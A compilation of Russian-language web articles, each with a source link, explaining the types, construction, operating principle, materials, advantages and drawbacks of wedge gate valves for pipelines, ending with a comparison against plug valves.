Принцип работы и сферы применения клиновых задвижек

Клиновая задвижка: виды и назначение

Клиновидная задвижка играет важную роль в обеспечении надежной работы трубопроводов, способствующих перемещению различных сред. Механизм устройства и способ работы отличается высокой эффективностью и функциональностью.

Что представляет собой клиновая задвижка?

Трубопроводная арматура широко используется при организации технологических процессов, работе энергосистем и перерабатывающих комплексов. Клиновидные задвижки являются разновидностью арматуры, обладающие некоторыми техническими особенностями.

Седла запорных элементов располагаются под углом, а запоры представляют собой клин, который изготавливается таким образом, чтобы максимально удовлетворять технологические нужды трубопровода. Они бывают жесткими, упругими или двухдисковыми.

В любом случае, при регулировке клинья плотно входят в межседельный промежуток и надежно закрывают путь движения перекачиваемого продукта. Тип клина выбирается, исходя из технических требований, предъявляемых к используемой системе транспортировки среды.

Виды задвижек

  • Фланцевая задвижка представляет собой самый распространенный вид запорной арматуры, широко использующийся в системах трубопроводов диаметром до двух тысяч миллиметров. Она находят применение как в промышленности, так и в жилищно-коммунальных трубопроводах, обеспечивающих жителей теплом, водой, газом и отводом канализационных вод. При этом они способны гарантировать качественное передвижение нефтепродуктов, пара, жидкости или других сред с давлением до 25 МПа и верхним пределом температуры 565 градусов по Цельсию. Фланцевая клиновая задвижка имеет репутацию надежного и эффективного средства регулировки и контроля.
  • Шиберная задвижка не предназначается для регулировки потока транспортируемой среды. Она может находиться только в двух положениях — открыто или закрыто — и устанавливается на горизонтальных трубопроводах. Задвижки бывают с выдвижными или не выдвижными шпинделями. Кроме того, специалисты различают их по способу крепления, используя фланцевые или безфланцевые соединения. Конструктивные особенности состоят в наличии специального диска управления, гарантирующего быстрое поднятие или опускание рабочего штока. Перекрытие потока движения среде обеспечивают специальные сальники и уплотнители.
  • Задвижки параллельные имеют похожую с клиновыми конструкцию. Основное отличие состоит в наличии параллельных дисков, гарантирующих надежное закрытие доступа перекачиваемого по трубопроводу материала. Достаточно простая конструкция дает возможность обеспечить трубопровод качественной арматурой по минимальной цене, при этом гарантировать долговечность и эффективность работы системы в целом. Поскольку она имеет минимальное гидравлическое сопротивление, то является главным элементом регулировки магистральных трубопроводов для работы ЖКХ.
  • Задвижка шланговая обеспечивает работу транспортирующих различные среды трубопроводов. Она дает возможность быстро и максимально эффективно перекрыть движение жидкости, пара или топлива и присоединяется к трубам при помощи фланцевых соединений. Механизм представляет собой металлический корпус с расположенными внутри пережимными устройствами и специальными патрубками, гарантирующими надежность работы трубопровода, подающего топливо, пар или воду. Температура перекачиваемой среды не должна превышать 170 градусов Цельсия, а давление 1,6 МПа.

Устройство и принцип действия задвижки

Клиновые задвижки не используются как механизм регулировки, они предназначаются для быстрого и эффективного перекрытия потока среды, транспортируемой трубопроводом. Наиболее часто используемый способ работы – ручной, при этом применяются специальные маховики, обеспечивающие возможность быстро опустить запорный элемент в предназначенное для этого место.

Получить консультацию
Однако внедрение автоматизированных систем управления все больше заставляет применять электромоторы для работы задвижек. Конструкция максимально проста. Металлический корпус с размещенными в нем элементами затвора, которые приводятся в действие при помощи специального штока.

Крепится такая арматура фланцевыми соединениями, гарантирующими полную герметичность и долговечность

Где размещается ходовой узел

Главным элементом управления является шпиндель-гайка, которая располагается внутри или снаружи корпуса. Совершая круговые движения, ходовая гайка в процессе работы выдвигает шпиндель на величину затвора.

Подобная конструкция носит название выдвижной и имеет ряд достоинств и недостатков. К первым относится отсутствие доступа к рабочей среде и быстрый доступ к рабочему узлу. Недостатком является увеличение массы арматуры и необходимость дополнительного пространства для установки.

Не выдвижной шпиндель размещен внутри и в процессе эксплуатации арматуры не выходит за пределы конструкции. Подобные затворы используются редко, так как механизм, погруженный в агрессивную среду, быстро выходит из строя, а ремонт сложен из-за невозможности доступа к системе регулировки.

Источник: https://apa-valves.ru/info/klinovaya-zadvizhka/

Задвижка клиновая для трубопровода: стальная, латунная, с выдвижным шпинделем

Чтобы сделать комфортной и безопасной подачу воды и отопления в здания различного предназначения, важно не только выбрать правильные трубы и хорошо их уложить. Здесь важна каждая деталь, в том числе и арматурное оборудование. Задвижки используются во всех видах стальных систем. Чтобы правильно выбрать продукт, следует ознакомиться с его особенностями, плюсами и минусами.

Клиновые задвижки применяют для отключения-подачи потока жидкости в трубопроводах самого разного назначения

Основные характеристики

Задвижка клиновая – это один из видов запорного арматурного оборудования для трубопроводов различного предназначения.

Она применяется для систем горячего и холодного водоснабжения, отопительных коммуникаций. Кроме того, устройство используют в системах, предназначенных для транспортировки жидких углеводородов, сжатого воздуха, а также других химикатов, к влиянию которых материал изделия невосприимчив.

Клиновая задвижка также популярна в газотранспортной и нефтяной промышленности, в сфере энергетики и системах жилищно-коммунального хозяйства.

Применяется такая деталь исключительно в роли запирающего элемента, так как режим эксплуатации предполагает только две фазы – открыто/закрыто (т.е. без промежуточных фаз).

Обратите внимание

Клиновая задвижка — это вариант запорной арматуры, с ее помощью можно только перекрыть или открыть движение носителя по трубопроводу

Изготавливают такое устройство из различных материалов по разным методикам. В зависимости от этого они распределяются на типы, которые используются для конкретных целей, в зависимости от свойств.

Плюсы запорного устройства

Популярность задвижек клиновых латунных на рынке сантехнического оборудования и в сфере промышленности обоснована существенными преимуществами деталей. Среди них:

  • несложная комплектация. Простота конструкции изделия облегчает работу с ним, а также установку и ремонт;
  • небольшая строительная длина;
  • малое гидравлическое сопротивление;
  • универсальность. Сталь – плотный и прочный материал, невосприимчивый к коррозии и влиянию некоторых химических веществ. Поэтому такое устройство можно применять в самых разных системах как по напору, скорости транспортировки рабочего вещества, так и по объемам. Кроме того, широк и сам спектр веществ, для работы с которыми можно применять задвижки;
  • долговечность. Благодаря свойствам материала и простоте конструкции, клиновая задвижка с невыдвижным или выдвижным шпинделем будет служить долго и бесперебойно, а если и потребуется ремонт, то он не окажется слишком сложным и дорогостоящим;
  • возможность транспортировки веществ в обоих направлениях;
  • простота использования. Вам не потребуется больших усилий для открытия/закрытия. Кроме того, для большего облегчения этой задачи в крупных системах устанавливают редуктор;
  • плавность при закрытии. Использование такого оборудования как латунная задвижка с невыдвижным или выдвижным шпинделем способствует обеспечению безопасности от гидравлических ударов, в некоторых случаях приводящих к деформированию и даже нарушениям целостности трубопровода.

Клиновые задвижки производятся самых разных размеров и устанавливаются даже на трубы из полимеров

Минусы задвижек

Несмотря на большое количество преимуществ, все же это оборудование не идеально. В некоторых случаях рекомендуется его не использовать или соблюдать при эксплуатации определенные правила. К его основным недостаткам и ограничениям на использование относят следующие:

  • большая строительная высота. В особенности это касается задвижек с выдвижным шпинделем. При открывании их нужно пространство высотой больше одного диаметра трубопровода;
  • длительность процедуры открывания/закрывания. Это делает систему менее оперативной, что в некоторых случаях усложняет работу с ней;
  • невозможность работы с веществами, содержащими крупные твердые включения;
  • низкий уровень износоустойчивости уплотнительных элементов в корпусе и затворе. Этот недостаток чреват дополнительными сложностями и затратами на ремонт. Несколько лучшими показателями в этом аспекте отличаются детали с выдвижным шпинделем, так как он не подвержен влиянию агрессивной среды;
  • маленький допустимый перепад давления в затворе. То есть, при большем перепаде возможны сбои в работе устройства;
  • относительно большие затраты времени, требующиеся для отвинчивания и завинчивания устройства.

Материалы и способы изготовления

Задвижки с выдвижным и невыдвижным шпинделем бывают разных видов в зависимости от их свойств и особенностей конструкции. Данное устройство может изготавливаться посредством литья или сварки. Первый метод характерен для изделий из стали и титановых сплавов.

Корпус задвижки может быть изготовлен при помощи технологии литья — для этого применяют специальные сплавы металлов

Технология производств не сложна:

Сначала стальные листы подают на конвейер, предварительно проверив их на наличие ржавчины либо окалины и удалив при надобности данные недостатки.

Затем их штампуют. Делается это на специальном станке, который совершает пластическую деформацию материала, зажимая лист между верхней и нижней поверхностью формовочного устройства. Получившиеся заготовки задвижек клиновых с выдвижным и невыдвижным шпинделем сваривают, тщательно проваривая все участки. Швы проверяются на крепость и износоустойчивость.

Литье также весьма распространено. Данный способ применяется относительно деталей из чугуна, алюминиевых сплавов, а также для стали. Однако детали, изготовленные таким способом, отличаются несколько худшими показателями в плане прочности и долговечности. Штампосварные задвижки с выдвижным и невыдвижным шпинделем изготавливаются из более прочного сырья и по своей конструкции более прочны.

Важной деталью являются еще и уплотнительные элементы. Их производят разных видов:

  • с кольцами (латунными или из фторопласта);
  • без колец;
  • с защитной антикоррозионной наплавкой;
  • с резиной, которой может быть покрыт клин (если задвижка клиновая).

Клиновая задвижка: классификация

Специфика латунных клиновых задвижек с выдвижным либо же невыдвижным шпинделем состоит в наличии клина – приспособления, которое выполняет функцию затвора, входя в позиции «закрыто» плотно между двумя седлами, расположенными по отношению друг к другу под углом.

От вида клина в задвижке зависит герметичность устройства и простота работы с ним

В зависимости от вида клина они классифицируются на виды.

Жесткий клин. Такое устройство обеспечит надежную герметизацию затвора.

Однако есть определенные недостатки: первое — в случае неполадок (заклинивание) будет трудно справиться с такой проблемой, и понадобится внушительная физическая сила; второе – для достижения эффекта герметичности, нужно очень точно рассчитать размеры и угол между седлами; третье – задвижку (с выдвижным и невыдвижным шпинделем) будет трудно или даже невозможно открыть в случае, если произошел существенный перепад температуры рабочего вещества, а также если оборудование повреждено коррозией или изношено.

Двухдисковый клин. Это более совершенное изделие. Хотя данный тип отличается более сложной конструкцией, чем предыдущий, однако это с лихвой окупается его преимуществами.

Во-первых, использование таких задвижек с выдвижным и невыдвижным шпинделем уменьшает вероятность заклинивания. Во-вторых, требуется меньше усилий при работе с ними.

Важно

Кроме того, в устройствах такого вида проще достигается герметичность затвора, потому что диски сами подстраиваются под угол между седлами. Это делает мелкие погрешности в расчетах несущественными.

Упругий клин. Он сочетает в себе все преимущества двух предыдущих устройств клиновых задвижек.

В случае использования данного вида запорного оборудования в конструкциях с выдвижным и невыдвижным шпинделем не нужна точная подгонка корпуса, как в ситуации с жестким аналогом, а конструкция его более простая, чем у двухдискового. По сути, данное приспособление – это тот же двухдисковый клин.

Отличаются они только соединительным элементом – в данном случае он эластичный. Конечно, это снижает способность дисков саморегулироваться под корпус изделия, однако обеспечивает большую устойчивость к перепадам температурного режима.

Задвижки с выдвижными и невыдвижными шпинделями

При выборе арматурного оборудование обращайте внимание на расположение ходового узла , представляющего собой резьбовое соединение шпиндель-гайка. От типа этого соединения напрямую зависит сфера возможного применения устройства.

Задвижка с выдвижным шпинделем — наиболее надежный и долговечный вид подобного оборудования

Бывает этот элемент двух видов:

Выдвижной. Это тип устройств со шпинделем, расположенным вне корпуса задвижки, нижним концом он соединяется с затвором и в позиции «открыто» выдвигается на высоту одного затвора.

Такие приспособления применяют в условиях повышенных требований к надежности оборудования.

Они прекрасно подходят для таких целей, так как обеспечивают простой и быстрый доступ к ходовому узлу со шпинделем и предотвращают деструктивные процессы вследствие влияния рабочей среды.

Невыдвижной. Это конструкция со шпинделем, погруженным в рабочее вещество. Конечно, такое устройство выигрывает перед устройствами с выдвижным шпинделем с точки зрения компактности и строительной массы, однако значительно уступает по долговечности и износоустойчивости.

Клиновая задвижка – это один из самых популярных типов запорной арматуры, так как является надежной и простой в обслуживании и применении. Соединение ее с трубами, как правило, фланцевое – оно позволяет неоднократно производить монтаж и демонтаж участка трубопровода. А это важно для быстрого и своевременного ремонта в случае необходимости.

Источник: http://TrubaMaster.ru/ventili-i-zadvizhki/zadvizhka-klinovaya.html

Принцип работы клиновых задвижек

Сфера использования такой конструкции, как клиновая задвижка, распространяется на систему трубопровода для полного перекрытия потока.

  Главным элементом данного вида арматуры служит конструкция в виде клина, который, в свою очередь, подразумевает под собой определенную  деталь,  функцией которой является закрытие сразу двух отверстий задвижки, находящиеся на минимальном расстояние друг от друга.

По принципу эксплуатации клиновых задвижек, данные элементы могут осуществлять свою работу, как в открытом, так и закрытом состояние.

Если рассматривать принцип работы клиновых задвижек более подробно, следует обратить внимание на отдельные элементы этой конструкции трубопровода.

Прежде всего, стоит отметить седло в задвижке, которое имеет вид своеобразного отверстия, исполняющего функцию главной рабочей среды.  Подвижным элементом данной конструкции, который отвечает, как за ее  поднятие так опускание,  является клиновый затвор.

Совет

Для того, чтобы рабочая среда могла беспрепятственно попадать в задвижку, а в  последствие в целую систему трубопровода, необходимо, в свою очередь, привести клин в поднятое положение, тем самым открывая два седла, которые находятся с обеих его  сторон.

Для того, чтобы осуществить перекрытие рабочей среды, необходимо опустить клин,  тем самым и два седла, с обеих его сторон, также станут перекрытыми.  За поднятие затвора задвижки, в свою очередь, отвечает специальный шпиндель, на который он может  накручиваться как автоматически, так  при помощи ручного управления,   а также присоединяется при помощи гайки.

Принцип работы клиновых задвижек так же может зависеть от характера движения шпинделя. Такой элемент  клиновых задвижек как шпиндель или шток, может иметь два вида,   а именно: выдвижные и не выдвижные шпиндели.

В том случае, если клиновая задвижка имеет выдвижной шпиндель, в процессе открытие данной конструкции значительным образом увеличивается ее  строительная высота, в то время как не выдвижные шпиндели ни как не влияют на высоты задвижек.

Рабочий процесс клиновых задвижек может также отталкиваться и от разновидностей затворов данной конструкции. Существует несколько видов затворов клиновых задвижек, а именно: жесткие, двухдисковые, а также упругие затворы. 

Если говорить о задвижках с жестким затвором, то данные конструкции имеют вид цельной детали, которая монтируется таким образом, чтобы два боковых седла плотно к ней прилегали.

Однако работа таких конструкций имеет некоторые недостатки, в виде систематических заклиниваний.

Более герметичными и практичными по принципу своей работы считаются именно те клиновые задвижки, которые имеют двухдисковые и упругие затворы, которые скрепляются между собой, как подвижно (двухдисковый клин), так и неподвижно (упругий клин).

Обратите внимание

К преимуществам работы клиновых задвижек можно отнести саму простоту данных конструкций, а также не большую строительную длину.

Однако, для того, чтобы осуществлять полное открытие и закрытие рабочего органа задвижек, необходимо прикладывать довольно таки большое усилие.

Помимо этого, по сравнению с обратным клапаном, открытие рабочего органа клиновой задвижки требует увеличения строительной высоты.

Источник: http://vestfiting.ru/stati/52-printsip-raboty-sharovykh-kranov

Задвижка с невыдвижным шпинделем

    Задвижка — это один из механизмов запорной трубопроводной арматуры. Ее назначение заключается в полном или частичном перекрытии потока технологической среды, движущейся по трубопроводу. В зависимости от функций, выполняемых устройством, задвижки могут относиться к запорным или регулирующим типам арматуры.

    Область применения задвижек достаточно широка. Их устанавливают, как на бытовых трубопроводах небольшого сечения, по которым осуществляется движение воды, газа, так и на магистральных, промышленных трубопроводах. В промышленных условиях по ним может перегоняться практически любой тип технологической среды, в том числе и агрессивной, токсичной, жидкой, газообразной, вязкой.

    Конструктивно различаются два основных типа задвижек:

 клиновые параллельные

Конструкция клиновой задвижки

   Задвижка данного вида получила свое название благодаря форме запирающего элемента — в виде клина. Клиновый механизм двигается в перпендикулярном направлении по отношению к потоку протекающей среды. Корпус задвижки выполняется из стали, в том числе нержавеющей, чугуна или сплавов цветных металлов.

На корпусе, с обоих концов, располагаются детали, которые обеспечивают закрепление задвижки на поверхности трубопроводов. Эти крепления могут быть трех видов: фланцевые, муфтовые, пригодные для приварки. Внутреннее устройство корпуса представлено шпинделем и гайкой, имеющей резьбу.

Когда начинается вращение одной из данных составляющих, затвор перемещается в определенное положение.

Герметичность перекрытия потока обеспечивается уплотнителями, которые располагаются под определенным углом один к другому.

   Для качественной работы запорного устройства важно, чтобы все внутренние детали, а также корпус, выполнялись из материалов со следующими характеристиками: · нейтральных к технологической среде, проходящей через них; · не подвергающихся коррозии: · имеющих высокую пропускную способность с учетом давления среды и ее температуры.

По типу управления задвижки в невыдвижным шпинделем могут быть механическими (приводятся в движение маховиком) или обладать редукторным приводом. Маховики обычно применяют на трубопроводах с диаметром не более 150 мм. Если существует необходимость в управлении запорным механизмом на расстоянии, то задвижки могут снабжаться электроприводом.

Особенности задвижки с невыдвижным шпинделем

   Принцип функционирования задвижки заключается в поступательном перемещении вверх-вниз запорного элемента — шпинделя. Задвижка клиновая с невыдвижным шпинделем отличается наличием жестко закрепленного на маховике штока (шпинделя). А гайка неподвижно фиксируется в корпусе.

Затвор поступательно перемещается и осуществляет свою деятельность по перекрытию потока среды при вращении маховика и штока через резьбовую гайку.

Важно

При полном опускании вниз — происходит перекрытие движения, при подъеме — шпиндель передвигается внутрь затвора и вместе с ним перемещается в камеру, тем самым, не препятствуя продвижению потока.

Важную функцию в задвижке с невыдвижным шпинделем выполняют уплотнители. Они обеспечивают герметичность перекрытия движения среды. Уплотнители чаще всего изготавливаются из металла. В случаях, когда затворы выполнятся обрезиненными, для производства уплотнителя используется, кроме металла, резина.

Отличия параллельной задвижки

   В отличие от клиновой задвижки в параллельной уплотнительные поверхности располагаются параллельно друг к другу. В них затвор имеет форму диска. Различают однодисковые и двухдисковые задвижки.

Положительным свойством двухдисковой задвижки является ее отличная герметичность.
Параллельная задвижка с невыдвижным шпинделем обладает невысоким гидравлическим сопротивлением.

Это свойство позволяет применять запорную арматуру данной конструкции на трубопроводах, по которым технологическая среда продвигается с высокой скоростью.

Задвижки с параллельной конструкцией устанавливаются на трубопроводы, по которым осуществляется движение технологической среды с давлением до 10 бар. До появления шаровых кранов и дисковых затворов параллельная задвижка была наиболее использованным механизмом запорной арматуры.

Преимущества и недостатки невыдвижного шпинделя

Основным достоинством задвижки с невыдвижным шпинделем является ее меньшая высота по сравнению с конструкцией с выдвижным шпинделем, поскольку во многих случаях при установке на трубопровод наблюдается ограниченность пространства, не позволяющая монтировать механизмы с выдвижными штоками. Подробное описание задвижки с невыдвижным шпинделем на этой странице.
Относительным недостатком данного вида запорной арматуры специалисты считают сложность проведения технического обслуживания и ремонта штока, так как он скрыт внутри корпуса.

Источник: https://admiralzavod.ru/zadvizhka_s_nevydvizhnym_shpindelem

Задвижки стальные фланцевые: виды, устройство, принцип действия

Стальные задвижки наиболее часто используемый вид запорной арматуры, используемый для установки в трубопроводах с высоким рабочим давлением.

Качественные характеристики стали и возможность ее обработки различными методами дали возможность получить большое количество видов стальных задвижек.

Такое многообразие видов запорной арматуры позволило обеспечить выполнение технических заданий по регулировке и надежному перекрытию рабочих потоков трубопроводов.

Стальные фланцевые задвижки — основные классификации

Для стальной запорной арматуры основным достоинством выступает сталь — прочный и одновременно легкий для традиционных видов обработки вид металла.

В физическом плане сталь по своим качествам легче чугуна, но в сравнении с чугунной отливкой способна выдерживать не только большие внутренние нагрузки, но и внешние. Эти свойства стали основными в выборе материала для корпуса устройства.

А дальше техника дала возможность использовать сталь в целом семействе запорной арматуры.

К стальным видам запорной арматуры относятся:

  1. Задвижки параллельного вида;
  2. Задвижки клинового типа.

Различия этих двух типов стальных устройств кроются в конструкции рабочего органа — виде затвора. Для параллельного вида устройства это выражается в наличии затвора с двумя параллельными плоскостями затворного устройства. А вот в клиновом виде роль затвора играет клин, рабочие поверхности которого имеют определенный угол наклона.

Классифицировать можно и по типу устройств подачи рабочего органа — шпинделя.

В устройстве стальных фланцевых задвижек встречаются устройства с выдвижным и невыдвижным шпинделем.
Запирание задвижек с выдвижным шпинделем осуществляется за счет движения шпинделя, расположенного за пределами корпуса.

Сам узел крепления шпинделя находится над корпусом, он легко разбирается и в случае необходимости просто ремонтируется.

Совет

Правда, устанавливая такое устройство нужно быть готовым к тому, что при необходимости открыть рабочий просвет устройства над штурвалом должно быть, как минимум, расстояние равное высоте задвижки, так далеко выдвигается шпиндель.

Для невыдвижного типа заглушек отрицательным моментом выступает их большой вес и довольно большие габариты корпуса. Кроме этого, ремонт и обслуживание узла крепления шпинделя существенно затруднено — он находится внутри корпуса.

Принцип работы стальных задвижек

Включение в устройство трубопроводной системы задвижки с параллельным или клиновым затвором основывается на требованиях задач, решаемых запорным узлом.

Для задвижек с параллельным и клиновым затвором принцип работы устройства практически идентичен:

  1. Затвор, находясь в открытом положении обеспечивает пропуск через корпус рабочего потока перекачиваемого вещества;
  2. При вращении шпинделя, он создает поступательное движение затвора;
  3. Затвор движется перпендикулярно потоку движения рабочей среды и уменьшает просвет прохода внутри корпуса;
  4. Рабочий поток, встречая на своем пути препятствие, уменьшает скорость и одновременно снижает количество вещества, проникающего в трубопровод после задвижки;
  5. При окончательном закрытии рабочего прохода корпуса затвор блокирует прохождение вещества по трубе.

Большим плюсом всех видов стальных задвижек выступает возможность их использования в качестве регулировочного устройства. Легкость управления и относительная точность расчета показаний позволяет использовать устройство как с электроприводом, так и в ручном режиме.

   В зависимости от перекачиваемых веществ применяются несколько видов клиновых затворов:

  1. Устройства с жестким типом затвора;
  2. Дисковые затворы;
  3. Задвижки с упругим клиновым затвором.

Принцип работы каждого из этих видов устройств схож. Однако, имеются и свои особенности в этой работе.

Жесткий тип затвора имеет простую и очень прочную конструкцию, однако, именно для него и выдвигаются особенно высокие требования в плане чистоты обработки и подгонки деталей.

Именно это и сказывается на относительно небольшом сегменте стальных фланцевых задвижек с жестким рабочим органом среди всех типов задвижек.

Примерно такие же проблемы возникают и с дисковым типом рабочего органа. Правда, при этом дисковый вид устройств имеет более компактный корпус, а значит у него и больше вариантов применения на практике.

А вот самыми популярными видами фланцевых задвижек выступают клиновые типы с упругими типами затворов. Под упругими типами затворов следует понимать рабочие органы устройства с обрезиненным клиновидным затвором.

В практической работе этот тип устройства рассекает рабочий поток не жестким диском, а упругим клином, и при закрытии прохода более плотно перекрывает поток.

Управление задвижками

Необходимость точности регулировки пропускной способности трубопровода при помощи стальных фланцевых задвижек привела к появлению нескольких видов органов управления задвижек.

Самым простым и надежным выступает ручное управление при помощи штурвала рулевого типа или сегментного. Точность регулировки при таком варианте управления невелика, но при определенной сноровке научиться регулировать поток можно с высокой точностью. Для этого достаточно правильно считать полные обороты штурвала, повороты на 12 оборота или даже на 14 или 16 его часть.

Для более точного и легкого управления задвижкой применяются механические приводы с градуированной шкалой оборотов и механизмом усиления.

Сложные производственные системы используют электрические системы управления — пневматические и электрические. Пневматические и гидравлические типы приводов используются в основном на задвижках большого диаметра, а вот электроприводы могут быть установлены на самых маленьких задвижках.

Виды фланцевых соединений

Простота и надежность фланцевых соединений стальных задвижек позволяет устанавливать их в нескольких типах запорных узлов трубопроводов.

Для установки используются фланцы:

  1. Плоские типы фланцев;
  2. Плоские с выступом;
  3. Фланцы с шипом и выступом.

Стальная арматура фланцевого типа соединения устанавливается в трубопроводах на приварные или резьбовые фланцы. В большинстве случаев используются именно приварные системы, в которых к трубопроводу в месте установки приваривается фланец и через прокладку устанавливается задвижка.

Для небольших размеров трубопроводов используются как промышленного производства заготовки, так и фланцы кустарного производства. Для трубопроводов диаметром от 100 мм соединение подбирается более точно.

Достоинства и недостатки стальных фланцевых задвижек

Применение стальных типов задвижек в трубопроводных системах требует учета как сильных, так и слабых сторон этого вида запорной арматуры.

К достоинствам задвижек стоит отнести:

  1. Высокую герметичность прибора;
  2. Небольшой вес;
  3. Возможность применения в трубопроводах разного назначения;
  4. Простота и надежность устройства;
  5. Широкий ассортимент продуктов, рассчитанный на широкий спектр выполняемых задач.

Относительно недостатков стоит вспомнить:

  1. Большая высота прибора с выдвижным шпинделем;
  2. Слабый отклик при установке в качестве регулировочного устройства — для получения требуемого потока необходимо своевременное указание управляющему устройству.

Источник: http://www.admiral-omsk.ru/zadvizhki-stalnie-flantcevie

Клиновые задвижки

Клиновой задвижкой называется трубопроводная арматура, имеющая запорный орган, выполненный клиновидной формы и перекрывающий движущуюся рабочую среду, перемещаясь перпендикулярно ей. Запорная арматура этого типа предназначается для полного перекрытия потока и имеет две рабочие позиции: целиком закрытая и целиком открытая.

Конструкция клиновых задвижек

Все клиновые задвижки конструктивно состоят из следующих основных элементов:

  1. Корпус;
  2. Запирающий узел;
  3. Механизм управления.

Для изготовления корпусов клиновых задвижек используется чугун или углеродистая сталь. У некоторых моделей они выпускаются из нержавеющей стали или сплавов цветных металлов.

Наиболее распространенными являются клиновые задвижки с корпусами, отлитыми из серого или высокопрочного чугуна.

Обратите внимание

Такая запорная арматура используется на трубопроводах больших диаметров и при высоких значениях температуры и давления.

Крепление корпусов клиновых задвижек к трубопроводам производится с помощью следующих типов соединений:

  • Фланцевого;
  • Муфтового;
  • Приварного.

Наиболее удобными считаются фланцевое и муфтовое соединения, поскольку они обеспечивают простоту и высокую скорость монтажа и демонтажа этого вида запорной арматуры. Преимуществом приварного соединения является его высокая надежность.

Запорные узлы клиновых задвижек выполнятся в виде:

  • Жесткого клиновидного затвора;
  • Двухдискового затвора;
  • Упругого затвора.

Жесткий клиновидный затвор устанавливается в крупногабаритные клиновые задвижки, используемые для установки в трубопроводах высокого давления. Они обеспечивают максимальную степень герметичности перекрытия потока рабочей среды.

Двухдисковые затворы состоят из двух запорных элементов, расположенных друг по отношению к другу V-образно и соединенных в нижней части стяжкой. Преимущество такой конструкции заключается в том, что она дает возможность обрабатывать седло корпуса с меньшей точностью и благодаря этому сокращать расходы на производство арматуры.

В упругом затворе в нижней части составного V-образного запорного клина располагается упругий элемент. В закрытом положении он раздвигает компоненты клина, что повышает герметичность перекрытия рабочей среды.

Клинья изготавливаются из стали или чугуна. Их уплотнительные части могут обрезиниваться, покрываться сплошными фторопластовыми покрытиями или запрессованными в металл фторопластовыми кольцами.

Узлы управления клиновыми задвижками состоят из соединенных с затворами штоков, а также передающих на них вращательный момент маховиков. Конструктивно они выполняются или с выдвижными, или с невыдвижными штоками.

Первые демонстрируют повышенную надежность и поэтому используются в клиновых задвижках, используемых в промышленных трубопроводах и трубороводах нефтегазовой отрасли.

Крутящий момент, необходимый для закрытия или открытия клиновой задвижки, транслируется или вручную, или с помощью электрических, пневматических приводов.

Принцип работы клиновых задвижек

Во всех клиновых задвижках поток рабочей среды проходит через отверстие, расположенное в седле. Если клин находится в поднятом положении, отверстие полностью открыто, и газ или жидкость свободно проходят через него.

Если клин находится в опущенном положении (то есть в положении «закрыто»), то отверстие перекрывается, и прохождение рабочей среды через него прекращается. Поднятие и опускание запорного элемента производится с помощью шпинделя, имеющего резьбу.

При вращении он перемещается или вверх, или вниз, увлекая за собой запорный элемент.

Преимущества и недостатки клиновых задвижек

По сравнению с другими типами запорной трубопроводной арматуры клиновые задвижки отличаются несколькими существенными преимуществами.

Главное из них состоит в том, что в открытом положении они оказывают минимальное (практически нулевое) сопротивление потоку рабочей среды.

Важно

Значительным достоинством этой запорной трубопроводной арматуры является и то, что она имеет малую строительную длину. Кроме того, конструкция клиновых задвижек отличается простотой.

К недостаткам этого типа запорной трубопроводной арматуры эксперты относят ее относительно большую строительную высоту. Еще одним минусом считается необходимость приложения для закрытия или открытия клиновой задвижки немалого усилия.

Сфера применения клиновых задвижек

Современные клиновые задвижки активно применяются в трубопроводах, по которым транспортируется холодная и горячая вода, водяной пар, нефть, продукты переработки нефти, природный газ. Запорная арматура этого типа может также использоваться в системах канализации.

Источник: http://www.antimult.ru/post/15712

Сравнение пробковых кранов и клиновых задвижек

Сегодня мы сравним особенности конструкции пробковых кранов и клиновых задвижек. Для начала надо понять, что эти типы запорной арматуры применяться для решения одних и тех же задач – перекрытие потока рабочей среды при его перемещении по трубопроводу.

Основные отличия пробковых кранов и клиновых задвижек

Эти два типа, отличаются друг от друга, типом запорного механизма. В пробковых кранах, в качестве затвора применяется пробка конусной или цилиндрической формы. В клиновой задвижке, в качестве запорного органа используется плоская деталь в виде клина, по сути, клиновая задвижка, это разновидность задвижек с плоским затвором.

Эти два запирающих устройства различаются принципом отсечения потока, в пробковом кране, поворот затвора вокруг своей оси перекрывает поток, а в клиновом затворе, поток отсекается после опускания затвора сверху вниз, перпендикулярно потоку рабочей среды.

Рисунок 1. Пробковый кран в разрезе   Рисунок 2. Задвижка клиновая в разрезе  

На рисунках 1 и 2 показаны виды пробковый и клиновый затвор соответственно.

Не менее существенным различием, между этими является их строительный размер. У пробковых кранов, этот размер существенно меньше. Дело в том, что клиновая задвижка, особенно полного прохода, по высоте будет как минимум равна двум диаметрам трубы, плюс механизм затвора.

Способы герметизации

Оба типа запорных устройств имеют свои тонкости в обеспечении герметичности.

В клиновой задвижке, плоскость затвора и плоскость седла находятся под неким углом друг к другу, и набегающий поток, создает усилие прижима в данном случае. Для понижения вероятности пропуска рабочей среды, в паре седло затвор, могу применяться уплотнения из различных материалов – резина, полимеры.

В пробковом кране, герметизация внутри корпуса, обеспечивается плотным прилеганием затвора к седлу.

Во времена, когда не было полимерных материалов, герметичность обеспечивалась притиранием пробки и седла.

В настоящее время, такой суровой необходимости нет, применение полимеров типа фторопласт обеспечивает нужную герметичность и без проведения этой трудоемкой операции.

Для предотвращения разгерметизации корпуса кранов и задвижек применяют практически одинаковые решения, сальниковые набивки, сильфоны.

Материалы

Для изготовления запорной арматуры обоих типов, применяют стали, чугун, цветные металлы, полимеры. Все зависит от условий их применения, характеристик перекачиваемой среды.

Для повышения расширения применения пробковых кранов, их внутренние части футеруют, то есть наносят полимеры, типа фторопласт, что существенно расширяет их сферу применения.

Рабочие параметры

Dn Pn   T, 0С 
Пробковые краны    15-500    До 40 — 100    -29oC + 316oC
Задвижки клиновые    15-200    До 16    -10 +120

ПРИМЕЧЕНИЕ:

В ТАБЛИЦЕ ПРИВЕДЕНЫ МАКСИАЛЬНЫЕ ПАРАМЕТРЫ В СООТВЕТСТВИИ С КАТАЛОГАМИ ПРОДУКЦИИ FluoroSeal и ARI-Armatuern (ARI-EURO-WEDI).

Из приведенных технических данных обоих типов запорной арматуры видно, что у пробковых кранов, сфера применения значительно шире, чем у клиновых задвижек.

Техническое обслуживание и ремонтопригодность

При выборе арматуры для установки на трубопроводной системе, не последнюю роль играет ее доступность для обслуживания и ремонта. Надо отметить, что современные пробковые краны, не требуют постоянной смазки пары затвор – седло, из-за применяемых материалов.

Затворы, в отличие от пробковых кранов, имеют резьбовую пару, которая обеспечивает подъем/опускание затвора, и соответственно располагается на открытом пространстве, что приводит к коррозии, или коксованию нанесенной ранее смазки, что соответственно приводит к дополнительным затратам на обслуживание.

Сферы применения

Пробковые краны, применяются практически во всех рабочих средах, перекачиваемым по трубопроводам – сырая нефть, кислоты, щелочи и пр.

Клиновые задвижки, широко применяются в жилищно-коммунальном хозяйстве, при обеспечении работы систем тепло и водоснабжения.

